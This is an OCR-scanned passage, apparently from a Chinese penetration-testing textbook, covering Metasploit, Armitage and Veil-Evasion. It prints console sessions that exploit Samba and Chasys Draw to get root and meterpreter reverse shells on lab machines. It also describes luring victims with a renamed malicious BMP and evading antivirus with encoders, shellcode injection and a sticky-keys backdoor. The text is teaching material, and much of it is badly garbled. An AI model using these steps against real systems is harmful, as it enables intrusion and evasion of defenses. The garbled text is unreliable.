漏洞 利用 并 不 总 是 有 详尽 的 文档 解释 毕竟， 没有 一 个 标准 用 于 管理 数据 系统 攻击 代码 的 创建 和 使 用 。 作 为 一 个 结果 ， 实 践 往往 较为 困难 ， 
特别 是 对 于 缺乏 应 用 开 友 的 测试 者 。 


20 Hem 《新 的 补丁 应 用 到 目标 系统 、 目 标 应 用 程序 中 的 语言 变化 ) 可 能 需要 对 源 代 码 进 行 重 大 调整 这 需要 一 个 有 经 
Jw. B" Ulo 


WS PEDE. BISOUS, ETEA. 18353 A fa RT RES UA Te TEXETI BUS dub CROC) 练习 ， 并 不 知道 该 代码 同时 为 该 应 用 
程序 建 了 一 个 后 门 ， 可 以 供 开发 者 使 用 。 


为 了 确保 结果 的 一 致 性 ， 遵 循 一 致 性 实践 的 程序 员 创 建 了 一 个 程序 员 社 区 ， 已 经 开发 出 几 种 渗透 利用 的 框架 。 其 中 ， 最 为 流 
行 的 是 Metasploit 框 架 。 


4.2.1 ” ”Metasploit 框架 


Metasploit 框 架 (Metasploit Framework, MSF) 是 一 个 开源 工具 ， 旨 在 便 利 渗透 测试 。 用 Ruby 语 言 编 写 ， 它 采用 了 模 
块 化 的 方法 来 完成 渗透 测试 。 这 使 得 它 易 于 扩展 和 编写 代码 ， 而 且 可 以 更 容易 实现 复杂 的 攻击 。 


MSF 可 向 后 端 模 块 提供 多 种 用 来 控制 测试 的 接口 (控制 台 、CLI 和 Web) 。 考 虑 到 速度 问题 ， 我 们 将 使 用 控制 台 接口 ， 因 为 
控制 接口 提供 了 攻击 命令 ， 并 且 它 在 一 个 易于 理解 的 界面 提供 了 所 需要 的 配置 参数 。 要 访问 该 界面 ， 需 在 命令 提示 符 下 输入 
msfconsole， 或 从 下 拉 菜 单 中 查找 十 大 安全 工具 (Top 10 Security Tools) 。 图 4.7 显 示 了 该 应 用 程序 的 局 动 界面 。 


Large pentest’ List, sort, group, tag and search your hosts and services 


in Metasploit Pro -- type ‘go pro’ to launch it now. 
=| metasploit v4./.0-2013082802 [core:4./ api:1.0] 
+ -- --=[ 1161 exploits - 641 auxiliary - 180 post 


[ 310 payloads - 30 encoders - 8 nops 


图 4.7 ”MSF 启动 界面 


MSF 框架 由 多 个 模块 组 成 ， 这 些 模块 组 合 起 来 可 以 影响 一 个 漏洞 利用 。 各 个 模块 及 其 具体 的 功能 如 下 : 


iS ~ 该 代码 片段 针对 特定 漏洞 主动 渗透 会 针对 某 个 特定 的 目标 进行 持续 性 渗透 ， 直 到 完成 任务 ， 然 后 退出 (例如 ， 缓 冲 区 洲 
被 动 渗透 是 指 等 待 进入 主机 ， 如 Web 浏 览 器 或 FTP 客 户 端 ， 当 它们 连接 时 再 进行 渗透 &. 


HAE: 这 是 在 成 功 渗透 后 立即 执行 的 恶意 代码 。 


-辅助 模块 : 这 些 模块 不 会 直接 在 测试 者 和 目标 系统 之 间 建 立 访问 路 径 ， 相反， 它们 执行 如 扫描 、 模 糊 或 嗅 探 等 相关 功能 以 支持 渗透 测试 。 


:后 期 模块 : 成 功 攻击 目标 后 ， 这 些 模 块 运行 在 受 损 目标 上 ， 收 集 有 用 的 数据 ， 支 持 攻击 者 深入 到 目标 网 络 。 我 们 将 在 第 5 章 继续 学 习 后 期 模 
块 利 用 。 


编码 器 : 当 渗 透 必须 绕 过 杀毒 防御 时 ， 这 些 模块 对 有 效 载荷 进行 编译 ， 以 使 得 它 不 会 被 签名 匹配 技术 检测 到 。 


无 操作 (NOP) : 这 些 是 在 攻击 时 用 来 促使 缓冲 区 溢出 的 。 
这 些 模 块 一 起 使 用 ， 用 于 对 目标 进行 侦察 并 发 动 攻击 。 使 用 MSF 渗透 目标 系统 的 大 致 步骤 如 下 : 
1. 选 择 并 配置 一 个 漏洞 利用 (用 于 击溃 目标 系统 上 特定 漏洞 的 代码 ) . 


2. 检 查 目 标 系统 ， 以 确定 它 是 否 容易 受到 漏洞 利用 的 攻击 。 此 步骤 是 可 选 的 ， 通 弟 将 其 省 略 来 减少 侦察 步骤 。 


3. 选 择 和 配置 有 效 载荷 (在 成 功 攻 击 后 ， 该 代码 将 在 目标 系统 上 执行 。 例 如 ， 从 站 到 破坏 的 系统 恢复 反 向 的 外 过 到 源 代 
码 ) 。 


选择 一 个 编码 技术 ， 用 其 来 绕 过 检测 控制 (1Ds/IPs 或 防 病毒 软件 ) 。 


5. 执 行 渗透 利用 。 


下 面 的 例子 呈现 了 对 目标 (基于 Linux 操 作 系 统 Metasploitable2) 的 简单 攻击 。 该 工具 可 以 在 网 
站 http://sourceforge.net/projects/metasploitable/files/Metasploitable2 下 载 。Metasploitable2 被 设计 成 易 攻击 的 ， 它 包 
含 各 种 已 知 并 且 有 特征 的 漏洞 ， 它 提供 了 一 个 标准 的 、 用 于 训练 和 检验 渗透 工具 的 平台 。 


当 作 为 一 个 虚拟 机 安装 的 时 候 ( 见 附录 ) ，Metasploitable 可 以 用 nmap 扫 描 ， 用 于 识别 开放 端口 和 相关 的 应 用 程序 。 图 


4.8 显 示 了 nmap 扫 描 的 部 分 结果 。 
root@kali:~# nmap -sV 192.168.43.129 


starting Nmap 6.40 ( http://nmap.org ) at 2013-09-03 12:25 EDT 
Nmap scan report for 192.168.43.129 

Host is up (0.00017s Latency). 

Not shown: 977 closed ports 


PORT SIATE SERVICE VERSION 

2l/tcp open ftp vsftpd 2.3.4 

22/tcp open ssh OpenSSH 4.7pl Debian Subuntul (protocol 2.0)| 
23/tcp | open telnet Linux telnetd 

25/tcp open smtp Postfix smtpd 

o3/tcp open domain ISC BIND 9.4.2 

80/tcp open http Apache httpd 2.2.8 ( (Ubuntu) DAV/2) 

lll/tcp open  rpcbind 2 (RPC #100000) 

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 


512/tcp open exec netkit-rsh rexecd 


图 4.8 ”nmap 扫 描 的 部 分 结果 


在 前 面 的 例子 中 ， 几 个 应 用 程序 都 疏 nmap 识 别 。 作 为 一 个 测试 者 ， 我 们 应 该 逐一 调查 任何 已 知 的 漏洞 。 开 始 的 第 一 
步 ，Metasploit 拥 有 利用 的 集合 。 可 以 使 用 以 下 命令 行 搜索 : 


msfi> search samba 


samba 服 务 返 回 漏洞 利用 的 列表 ， 人 列表 按 照 各 个 漏洞 被 利 用 成 功 的 相对 难 易 进行 排名 。 图 4.9 显 示 了 使 用 samba 扫 摘 漏 洞 的 


Matching Modules 


Name Disclosure Date Rank D 


=: æ = æ = = LO =F fF fF fF FF Sf SF 2S | = = e = - 


auxiliary/admin/smb/samba symlink traversal normal S 
amba Symlink Directory Traversal 

auxiliary/dos/samba/lsa addprivs heap normal S 
amba lsa io privilege set Heap Overflow 

auxiliary/dos/samba/lsa transnames heap normal S 


amba lsa io trans names Heap Üverflow 


exploit/freebsd/samba/t rans2open 2003-04-07 S 


图 4.9 ”使 用 samba 扫 描 漏洞 


因为 exploit/multi/samba/usermap_script 漏 洞 利用 的 排名 靠 前 ， 所 以 剩 下 部 分 选择 其 作为 例子 。 这 个 排名 由 Metasploit 
的 开 友 团队 确定 ， 并 注 明 了 一 个 熟练 的 测试 者 如 何 可 靠 地 测试 一 个 稳定 的 系统 的 漏洞 。 在 现实 生活 中 ， 许 多 不 确定 因素 (测试 者 
的 技能 、 网 络 中 的 保护 装置 、 对 操作 系统 和 应 用 程序 的 修改 ) 会 对 漏洞 利用 的 可 靠 性 产生 显著 影响 。 


有 关 漏洞 利用 的 附加 信息 可 以 通过 下 面 的 命令 获得 : 


msf> info exploit/multi/samba/usermap script 


回 的 信息 包括 引用 ， 如 图 4.10 所 示 。 


返 
msf > info exploit/multi/samba/usermap script 


Name: Samba “username map script" Command Execution 
Module: exploit/multi/samba/usermap script 
PLatform: Unix 
Privileged: Yes 
License: Metasploit Framework License (BSD) 
Rank: Excellent 


Provided by: 
jduck <jduck@metasploit.com> 


Avallable targets: 
Id Name 


9 Automatic 


Basic options: 
Name Current Setting Required Description 


RHOST yes The target address 
RPORT 139 yes The target port 


Payload information: 
Space: 1024 


Description: 
This module exploits a command execution vulerability in Samba 
versions 3.0.20 through 3.0.25rc3 when using the non-default 
"username map script" configuration option. By specifying a username 
containing shell meta characters, attackers can execute arbitrary 
commands. No authentication is needed to exploit this vulnerability 
since this option is used to map usernames prior to authentication! 

图 4.10 ”漏洞 利用 的 附加 信息 

为 了 对 Metasploit 进 行 演示 ， 我 们 将 通过 该 漏洞 利用 来 攻击 目标 ， 命 令 如 下 : 


msf> use exploit/multi/samba/usermap script 


Metasploit 将 命令 提示 符 msf> 变 为 msf exploit (usermap script) >, 
Metasploit 提 示 测 试 者 选择 有 效 载 三 (例如 ， 从 遭 到 破坏 的 系统 恢复 的 逆向 外 膏 ) ， 同 时 设置 其 他 变量 ， 变 量 如 下 所 示 : 
:远程 主机 (Remote host, RHOST) : 被 攻击 的 系统 IP 地 址 。 


ALL 


XwEEMSLI (Remote port, RPORTO : 用 于 漏洞 利用 的 端口 号 。 


: 术 地 主机 (Local host, LHOST) : 用 于 发 动 攻击 的 系统 IP 地 址 。 


设置 完 所 有 参数 变量 后 ， 在 命令 提示 符 下 输入 渗透 利用 命令 ， 友 动 攻击 。Metasploit 友 起 攻击 ， 然 后 确认 一 个 逆向 shell 已 
经 由 命令 command shell 1 opened 启 动 ， 给 出 源 IP 地 址 ， 最 后 终止 逆向 shell。 


为 了 验证 shell 是 存在 的 ， 测 试 者 针对 主机 名 、 用 户 名 (uname-a) 和 whoami 进 行 询 问 、 查 询 ， 并 确定 结果 是 否 与 远程 目 
标 系统 相对 应 ， 参 见 图 4.11。 


msf exploit(usermap script) > set PAYLOAD cmd/unix/reverse 
PAYLOAD => cmd/unix/ reverse 

msf exploit(usermap script) > set RHOST 192.168.14.129 
RHOST => 192.168.14.129 

msf exploit(usermap script) > set RPORT 445 

RPORT => 445 

msf exploit(usermap script) > set LHOST 192.168.14.128 
LHOST => 192.168.14.128 

msf exploit(usermap script) > exploit 


started reverse double handler 
[*] Accepted the first client connection... 
"] Accepted the second client connection... 
Command: echo EBIVvRXgDOENzzZq; 
| Writing to socket A 
| Writing to socket B 
Reading from sockets... 
| Reading from socket 日 
B: "EBIVvRXgDOENzz2q\r\n" 
Matching... 
| A is input. 
Command shell session 1 opened (192.168.14.128:4444 -> 192.168.14.129:48108) 
at 2013-09-02 13:48:49 -0400 


hostname 
metasploitable 


uname -a 


Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 Gj 
NU/Linux 


whoami 
root 


图 4.11 了 验证 shell 


当 系统 损害 到 这 个 程度 ， 攻 击 者 已 准备 好 接 下 来 的 后 期 漏洞 利用 ( 见 第 5 草 和 第 6 草 ) 。 为 Metasploit 添 加 新 的 漏洞 利用 
时 ， 用 Ruby 脚 本 (.rb) 或 Python (.py) 语言 ， 将 它们 放置 在 位 于 主 目录 下 的 隐藏 文件 夹 .msf4 中 ， 然 后 重新 加 载 


msfconsole。 


4.2.2 ”利用 易 受 攻击 的 应 用 程序 


Metasploit 框 架 针 对 第 三 方 应 用 的 漏洞 攻击 效果 ， 等 同 于 对 操作 系统 的 漏洞 攻击 效果 。 在 这 个 例子 中 ， 我 们 将 利用 一 个 缓 
冲 区 泣 出 漏洞 ， 这 是 Chasys Draw IES (版 本 4.10.01) 的 一 个 漏洞 。 由 于 ReadFile 函 数 人 存在 脆弱 性 ， 它 用 一 个 不 安全 的 方式 仔 
储 用 户 提供 的 数据 。 利 用 的 结果 是 在 用 户 的 上 下 文中 执行 任意 代码 。 


发 起 攻击 ， 测 试 者 需要 生成 一 个 特制 的 BMP 文件 ， 然 后 让 受害 者 用 Chasys 应 用 程序 打开 文件 。 当 打开 文件 时 ， 它 会 击 垮 受 
害 者 的 基本 操作 系统 (对 Windows XP SP3、Windows 7 SP1 是 有 效 的 ) 。 


第 一 步 是 打开 MSF 控制 平台 (msfconsole) , 2f EfsFHexploit/windows/fileformat/chasys draw ies bof 设 置 的 
Metasploit， 如 图 4.12 所 示 。 


msf > use exploit/windows/fileformat/chasys draw ies bmp bof 


msf exploit(cl Ss bm of) > set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 

msf exploi | : | F) > set LHOST 192.168.75.130 

LHOST => 192.168. 75.130 

msf exploit(cl dra ) » exploit 


msf.bmp stored at /root/.msf4/local/msf.bmp 


图 4.12 ”打开 msfconsole 使 用 Chasys-Dtaw 


第 二 步 ， 该 漏洞 利用 是 一 个 相对 简单 的 漏洞 利用 。 它 要 求 测试 人 员 设 置 一 个 反 向 shell (reverse tcp) ， 从 被 击 垮 的 系统 回 
到 攻击 者 的 系统 ， 即 本 地 主机 (LHOST) 。 


当 利 用 完成 后 ， 它 创造 了 特制 的 BMP 文 件 ， 存 储 文件 的 默认 名 为 msf.bmp。 要 吸引 目标 打开 该 文件 ， 并 且 避 人 免 一 些 设备 可 
能 检测 到 默认 和 名称， 最 好 将 文件 名 改 为 与 预定 目标 更 为 相关 的 名 称 。 


第 三 步 是 打开 MSF 控 制 台 的 一 个 新 实例 ， 并 为 传 入 的 逆向 TCP 的 外 过 设置 一 个 监听 ， 便 于 即时 监听 到 目标 投降 的 信息 。 一 个 
简单 的 监听 器 如 图 4.13 所 示 。 


e: «piolt/multi/ ‘handle! 
nsf exploi t(h r) > set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 
msf exploit (hs ere > set LHOST 92.168./5.130 
LHOST => 92.168.75.130 
msf exploit(hand ler) > exploit 


Handler failed to bind to 92.168./75.130:4444 
Started reverse handler on 0.0.0.0:4444 
Start ing the payl oad handler... 


图 4.13 ”一 个 简单 的 监听 器 


旦 受害 者 在 易 受 攻击 的 应 用 程序 中 打开 特制 的 BMP 图 像 文 件 ， 一 个 meterpreter 会 话 会 在 两 系统 之 间 打 开 。msf 提 示 符 被 
meterpreter 提 示 符 取代 ， 攻 击 者 使 用 命令 shell 可 以 有 效 地 访问 远程 系统 。 攻 击 的 第 一 步 是 验证 你 在 目标 系统 上 ; 你 可 以 在 图 
4.14 中 看 到 ，sysinfo 命 令 标识 出 计算 机 名 称 和 操作 系统 ， 这 验证 了 一 次 成 功 的 攻击 。 


sf exploit(handler) > exploit 


[-] Handler failed to bind to 92.168./5.130:4444 

Started reverse handler on 8.0.0.0:4444 

Starting the payload handler... 

Sending stage (/69024 bytes) to 192.168.75.1 

Meterpreter session 1 opened (192.168,./5.130:4444 -> 192.168.75.1:2008) at 2 
014-03-15 01:17:38 -0400 


- > sysinfo 


: DIGITALDEFGI 
OS : Windows 7 (Build 7601, Service Pack 1). 
Architecture : x64 (Current Process is WOW64) 
System Language : en CA 
Meterpreter : xB5/win32 


meterpreter > 


图 4.14 使 用 sysinfo 命 邻 


4.3 ”使 用 Armitage 的 多 目标 渗透 


Armitage 经 常 被 渗透 测试 者 忽视 ， 由 于 测试 者 喜欢 Metasploit 控 制 台 的 传统 命令 行 输入 ， 而 避 开 Armitage 的 图 形 界面 。 然 
而 ，Armitage 在 可 视 化 选项 的 环境 下 ， 拥 有 Metasploit 的 功能 ， 使 其 成 为 在 复杂 测试 环境 下 的 一 个 绝 传 选择 。 不 与 Metasploit 
不 同 ， 它 允许 你 在 同一 时 | 间 测 试 多 个 目标 ， 上 限 为 512 个 。 


启动 Armitage， 并 确保 已 启动 数据 库 和 Metasploit 服 务 ， 使 用 以 下 命令 : 


service postgresql start 
service metasploit start 


完成 上 一 步 之 后 ， 在 命令 提示 符 下 输入 armitage， 并 执行 该 命令 。Armitage 并 不 忌 是 能 正 党 执行 ， 它 可 能 需要 重复 局 动 的 
步骤 ， 以 确保 它 在 正确 运行 。 


为 了 上 友 现 可 用 的 目标 ， 你 可 以 手动 提供 IP 地 址 增加 主机 ， 或 选择 菜单 栏 上 的 nmap 扫 摘 添 加 主机 。Armitage 还 可 以 使 用 
MSF 辅助 命令 或 DNS 枚 举 来 列举 目标 。 


Armitage 可 以 从 下 列 文件 获得 主机 的 数据 : Acunetix, amap. AppScan, Burp proxy, Foundstone, Microsoft 
Baseline Security Analyzer, Nessus NBE 和 XML files、NetSparker、NeXpose、nmap、OpenVas、Qualys， 以 及 
Retina。Armitage 司 始 界 面 如 图 4.15 所 示 。 


Armitage View [abies Attacks Workspaces Help 


* [F auxiliary import Hosts 
= (li exploit Add Hosts... 
jj = payload [in ap Scan 
> (li post MSF Scans... 
DNS Enumerate 


Intense Scan 
Intense Scan + UDP 
Intense Scan, all TCP ports 
Clear Database Intense Scan, no ping 

| Ping Scan 

Quick Scan 

Quick Scan (OS detect) 
Comprehensive 


图 4.15 Armitage È 45 Zi 


Armitage 人 允许 通过 右 击 选择 一 个 主机 ， 设 置 该 主机 的 标签 ， 然 后 选择 一 个 主机 (host) 菜单 ， 并 且 选 择 设置 标签 (set 
Label) 功能 。 这 允许 你 使 用 一 个 共同 的 名 字 来 标记 某 个 特定 的 地 址 或 确认 主机 ， 当 使 用 基于 团队 的 测试 时 ， 这 是 很 有 帮助 的 。 
这 个 过 程 如 图 4.16 所 示 。 


Input 


Set label to: 
Primary Target 


[cancel | 
| 


E416 ”设置 主机 标签 


Armitage 还 支持 动态 工作 空间 一 一 网 络 的 俑 选 视图 ， 可 以 将 网 络 标准 、 操 作 系 统 、 开 放 的 端口 和 服务 、 标 签 等 作为 筛选 的 
条 件 。 例 如 ， 你 可 以 测试 一 个 网 络 ， 并 确定 几 个 服务 器 ， 但 是 不 出 现 该 网 络 的 其 他 剩余 内 容 。 给 它们 一 个 标签 ， 让 这 些 内 容 能 够 
突出 显示 ， 然 后 将 它们 放置 在 一 个 优先 级 的 工作 空间 中 。 


一 旦 在 网 络 上 确定 了 目标 系统 ， 就 可 以 选择 特定 的 模块 作为 实现 漏洞 利用 过 程 的 一 部 分 。 你 还 可 以 使 用 菜单 栏 中 的 攻击 
(Attacks) 选项 来 得 找 攻击 方法 。 


AHAHAH, mE (Attacks) 菜单 ， 选 择 一 个 漏洞 (确保 设置 正确 的 主机 操作 系统 ， 这 并 不 总 是 目 动 及 生 ) 。 


一 个 有 趣 的 选项 是 Hail Mary， 位 于 攻击 (Attacks) 菜单 下 。 通 过 选择 这 个 功能 ， 所 有 识别 系统 都 会 目 动 对 漏洞 目 标 进行 
攻击 ， 以 达到 可 能 击 垮 目标 的 最 大 数量 。 这 是 一 个 非常 嗜 杂 的 攻击 ， 因 此 应 该 被 用 来 作为 测试 选择 的 最 后 手段 。 这 也 是 一 个 很 好 
的 方式 ， 用 来 确定 是 否 安 装 好 了 入 侵 检测 系统 ， 并 且 配 置 正确 ! 


被 击 垮 的 系统 显示 为 一 个 带电 火花 的 红色 边界 图 标 。 在 图 4.17 中 ， 两 个 测试 系统 已 经 被 击 垮 ， 在 这 些 系统 和 测试 者 之 间 有 四 
个 活动 会 话 。 活 动 会 话 (Active Sessions) 面板 表示 这 个 连接 ， 并 确定 了 哪些 漏洞 会 成 为 攻击 目标 。 图 4.17 代 表 了 不 同 的 选 


E, 


Armitage View Hosts Attacks Workspaces Help 


A = 


Console X | Worespaces X Hail Mary X 


Active sessions 


Td Type Infomation Connection 


1 shell php 192. 168. 43. 130; 45323 -> 197,163.43, 179: 19838 (192, 168,43, 129) 
exploit/multi/http/php cgi arg injection 

2  meterpreter java/java 192. 168. 43., 130: 52826 -> 192,168.43. 129: 20767 (192. 168., 43.129) 
exploit/multi /misc/java mi server 

3 shell 192.168,43, 130: 40725 -> 192,168.43. 120: 1949 (192, 158,43. 129) 
exploit/unix/irc/unreal ircd 3281 backdoor 

4 shell 192.168,43, 130: 35884 -> 192,168.43. 129:62080 (192,1658,43.129) 


expleit/unix/ftp/vsftpd 234 backdoor 


A417 被 攻击 主机 与 测试 者 之 间 的 活动 会 话 


— : Hail Mary 选 择 确定 Air 并 且 局 动 了 两 个 活动 会 话 。 手 工 测 试 同一 目标 ， 最 终 确定 了 
8 个 可 利用 的 漏洞 ， 在 被 击 垮 的 系统 和 测试 之 间 建 立 了 多 条 通信 通道 。 在 真实 世界 这 种 类 型 的 测试 强化 了 这 种 类 型 的 优点 ， 并 且 强 化 了 在 渗透 
测试 过 程 中 使 用 目 动 化 工具 的 弱 反 。 


4.3.1 Armitage 测试 团队 


Armitage 的 前 端 图 形 界面 超过 Metasploit 框 架 ， 它 是 一 个 使 用 脚本 的 渗透 测试 工具 ， 人 允许 一 个 团队 使 用 Metasploit 框 架 的 
一 个 实例 ，GUI 显 示 以 下 功能 


' 它 使 用 同一 个 会 话 ， 多 许 一 个 测试 人 员 来 监督 这 个 过 程 ， 识 别 感 兴趣 的 结果 ， 并 控制 测试 的 方向 。 

` 它 运行 脚本 以 自动 测试 任务 。 

' 它 共享 下 载 的 文件 ， 如 密码 文件 。 这 允许 一 个 团队 成 员 集 中 在 密码 破解 上 ， 而 其 他 团队 成 员 继 续 渗透 阶段 。 
' 它 使 用 一 个 共享 事件 日 志 进 行 通信 。 


为 了 充分 利用 团队 配置 ， 确 保 Armitage 没 有 正式 运行 ， 然 后 在 Armitage 目 录 提 示 符 下 调用 teamserver 脚 本 ， 通 党 的 目录 


是 /usr/share/armitage， 命 令 如 下 : 


root@kali:/usr/share/armitage# ./teamserverip address password 


确保 IP 地 址 是 正确 的 ， 因 为 它 不 被 Armitage 验 证 ， 所 有 的 团队 成 员 都 可 以 通过 端口 55553 访 问 主 机 。 当 你 开局 Armitage 团 
队 服 务 器 时 ， 团 队 成 员 使 用 一 个 SSL 证 书 通信 ; 团队 成 员 应 该 验证 证 书 的 SHA-1 与 服务 器 的 SSL 证 书 的 相应 值 是 人 否 匹 配 。 


当 teamserver 脚 本 运行 时 ， 不 要 连接 到 127.0.0.1， 因 为 Armitage 使 用 这 个 IP 地 址 连接 ， 并 确定 它 是 否 应 该 使 用 
SSL (teamserver 或 远程 地 址 ) 或 者 不 使 用 SSL (localhost 或 msfrpcd) 。 为 了 连接 Armitage 到 本 地 的 teamserver， 在 主机 领 
域 使 用 外 部 IP 地 址 。 


FAP RATA TES Tass shell. base. Rade, FRNA. EEA, shell ihZBEBSAE, TAREA. 7A 
而 ,一 些 Meterpreter 脚 本 可 能 随 着 时 间 的 推移 而 失效 。 


为 作为 一 个 团队 通信 ， 氮 击 菜单 栏 中 的 视图 (view) 菜单 以 打开 共享 事件 日 志 。 你 可 以 进入 日 志 只 要 你 曾经 使 用 IRC， 或 一 
些 其 他 的 聊天 室 ， 并 且 这 个 日 志保 留 所 有 注释 的 永久 记录 。 


4.3.2 Armitage 攻 击 脚本 


Armitage 包 括 : Cortana 脚 本 语言 ， 它 基于 sleep， 一 个 类 似 于 Per| 语 言 的 扩展 语言 。Cortana 脚 本 可 以 定义 键盘 快捷 键 、 
插入 菜单 ， 并 创造 独特 的 用 尸 界面 。 


脚本 可 以 作为 独立 的 实体 来 运行 (前 提 是 Armitage 团 队 服 务 器 处 于 活动 状态 ) ， 或 者 直接 从 Armitage 运 行 。 要 加 载 现 有 的 
脚本 ， 在 主 莱 早 栏 中 选择 Armitage， 然 后 选择 脚本 (Scripts) 。 会 打开 分 页 视图 ， 通 过 一 个 按钮 便 可 选择 加 载 脚 本 。 


Armitage 还 提供 了 一 个 脚本 环境 ， 它 从 菜单 的 Viewl|Script Console 表 调用 ， 如 图 4.18 所 示 。 


Scripts X [ cortana X] 


cortana> help 


Commands 


askott 
askon 
help 
Load 
Logoff 
Logon 
Ls 
prott 
profile 
pron 
reload 
troff 
tron 
un Load 


图 4.18 Armitage Ep AK Xf 5t, 


使 用 Metasploit 框 架 的 、 完 全 扫描 目标 系统 的 一 个 简单 脚本 可 以 写成 scanner.cna。 每 当 一 个 新 的 主机 加 入 (host add) 
时 ，MSF 的 端口 扫描 程序 会 扫描 一 个 定义 的 TCP 端 口 列表 ， 以 及 可 用 的 UDP 端 口 。 参 考 下 面 的 代码 片段 ， 这 就 是 一 个 扫描 脚 
A: 


# MSF port scanner 
onhost add { 
println("[*] MSF Port Scanner New Host OpenPorts on$1"); 
Sconsole = console(); 
emd(Sconsole, "use auxiliary/scanner/portscan/tcp"); 
emd(Sconsole, "set THREADS 12") ; 
cmd(Sconsole, "set PORTS 139, 143"); 
# enter other ports as required 
cmd(Sconsole, "set RHOSTS S1"); 
cmd(Sconsole, "run -j"); 
cmd($console, "use auxiliary/scanner/discovery/udp sweep"); 
cmdí(5console, "set THREADS 12"); 
cmd(S5console, "set BATCHSIZE 256"); 
cmd(Sconsole, "set RHOSTS S1"); 
cmd{Sconsole, "run -j"); 
db sync () ; 


| 


由 于 Cortana 已 经 广泛 与 Metasploit 框 染 结 合 ， 脚 本 可 以 被 用 于 目 动 友 动 攻 击 ， 进 行 后 期 漏洞 利用 活动 ， 如 跟 踊 用 户 活 动 ， 
便于 多 个 用 户 跨 过 攻击 者 的 杀 链 活动 。 


4.4” 绕 过 |DS 与 反 病 毒 侦 测 


杀 链 的 利用 阶段 是 最 危险 的 一 个 阶段 ， 渗 透 测 试 者 或 攻击 者 直接 与 目标 网 络 或 系统 交互 ， 他 们 的 活动 很 可 能 会 被 记录 ， 他 们 
的 身份 也 很 可 能 会 被 友 现 。 因 此 ， 必 须 及 用 隐身 技术 ， 以 最 大 限度 地 减少 测试 者 暴露 的 风险 。 虽 然 没 有 有 具体 的 方法 或 工具 可 以 确 
定 无 法 检测 的 , 但 是 ， 改 变 一 些 配 置 ， 以 及 利用 特别 的 工具 ， 将 使 检测 更 加 困难 。 


当 考 碟 远 程 攻 击 时 ， 大 多 数 网 络 和 系统 采用 不 同类 型 的 防御 控制 ， 以 减少 攻击 的 风险 。 网 络 设备 包括 路 由 器 、 防 火 墙 、 入 侵 
多 测 和 预防 系统 ， 以 及 恶意 软件 检测 工具 。 


为 了 方便 漏洞 利用 ， 大 多 数 的 框架 纳入 了 使 攻击 具有 某 种 隐身 的 功能 。Metasploit 框 以 允许 你 手动 设置 基于 利用 漏洞 利用 
(exploit-by-exploit) 的 规避 因素 ; 然而 ， 确 定 那 一 个 因素 (如 作为 加 密 、 端 口号 、 文 件 名 和 其 他 因素 ) 是 困难 的 ， 同 时 ， 改 
变 每 一 个 特定 的 1DS 也 是 困难 的 。 该 Metasploit 框 架 还 允许 目标 和 攻击 系统 之 间 的 通信 是 加 密 的 
(Windows/meterpreter/reverse tcp_rc4 有 效 载 倚 ) ， 使 得 检测 到 所 利用 的 有 效 载体 变 得 非常 困难 。 


Metasploit Pro 可 作为 Kali 分 布 的 一 个 试验 ， 包 括 以 下 具体 绕 过 入 侵 检 测 系统 的 方法 : 


-在 发 现 扫 描 (Discovery Scan) 的 设置 中 ， 扫 描 速 度 可 以 调整 ， 为 减少 与 目标 的 交互 速度 ， 可 以 将 速度 设置 为 较 低 。 
通过 友 送 小 的 TCP 数 据 包 ， 并 增加 数据 包 之 则 的 传输 时 间 。 
-减少 针对 目标 系统 的 同时 攻击 的 数量 。 


:设置 DCERPC、HTTP 和 SMB。 


大 多 数 反 病毒 软件 依靠 签名 匹配 来 定位 病毒 和 其 他 恶意 软件 。 它 们 检查 每 一 个 已 知 的 病毒 (签名) 的 可 执行 代码 串 ， 当 检测 
到 一 个 可 疑 的 字符 串 时 ， 创 建 一 个 报警 。 许 多 Metasploit 的 攻击 者 依赖 于 可 能 具有 签名 的 文件 ， 随 着 时 间 的 推移 ， 这 样 的 文件 


ARES) Sl. 


对 此 ，Metasploit 框 以 允许 独立 的 可 执行 文件 通过 编码 来 绕 过 检测 。 不 笠 的 是 ， 在 公共 场所 ， 这 些 可 执行 测试 的 泛滥 (如 


virustotal.com) 降低 了 其 绕 过 AV 软 件 的 有 效 性 。 


一 个 新 的 AV- 逃 脱 框 架 ， 由 Chris Truncer 完 成 ， 叫 作 Veil-Evasion (www.veil-evasion.com) ， 正 在 对 独立 的 漏洞 利用 提 
供 有 效 的 保护 。Veil-Evasion 利 用 一 个 简单 管理 框架 ， 规 避 各 种 外 过 代码 (shellcode) 注入 技术 。 


作为 一 个 框架 ，Veil-Evasion 具 有 一 些 特性 ， 主 要 包括 如 下 几 点 : 


' 它 可 以 让 目 定 义 的 shellcoge 与 多 种 编程 语言 结合 ， 包 括 C、C#、Python。 
它 可 以 使 用 Metasploit 生 成 she1L1Lcoqe。 

它 可 以 集成 第 三 方 工具 ， 如 Hyperion (使 用 AES-128 加 密 EXE 文 件 ) . PEScrambler. BackDoor Factory. 
‘Veil-Evasion evasion.cna 脚 本 允许 Veil-Evasion 锌 集成 到 Armitage 和 其 商业 版 Cobalt Strike 中 。 
:有效 载 集 可 以 生成 和 无 颖 代入 到 所 有 PsExec 调 用 。 

-用户 有 能 力 重 用 shellcode 或 实现 他 们 自己 的 加 秘方 法 。 

` 它 具有 上 自动 化 部 和 敬 脚 本 的 功能 。 

Veil-Evasion 在 不 断 发 展 ， 它 的 框架 已 经 有 扩展 模块 ， 如 Veil-Evasion-Catapult (有 效 载 傈 交付 系统 ) 。 


Veil-Evasion 可 以 产生 漏洞 利用 有 效 载 傈 ; 独立 的 有 效 载 倚 包 括 以 下 选项 : 


-调用 shellcode 安 小 最 小 版 的 Python; 上 传 一 个 最 小 的 python .zip 安 钱 文件 和 7zip 二 进 制 文 件 。Python 环 境 是 解压 缩 的， 调用 
shellcode。 因 为 唯一 的 文件 ， 与 受害 者 互动 的 是 值得 信赖 的 Python 库 和 解释 占 ， 受 害 者 的 AV 不 检测 或 不 报警 任何 不 寻 第 的 活动 。 


Sethc 后 门 ， 它 将 配置 受害 者 的 注册 表 ， 局 动 粘 洲 键 RDP 后 门 。 


:PowerShell 的 shellcode 注 入 。 

当 载 倚 已 经 建立 ， 可 以 用 以 下 两 种 方法 之 一 传递 到 目标 : 
-使 用 Impacket 和 PTH 工 具 包 上 传 并 执行 。 

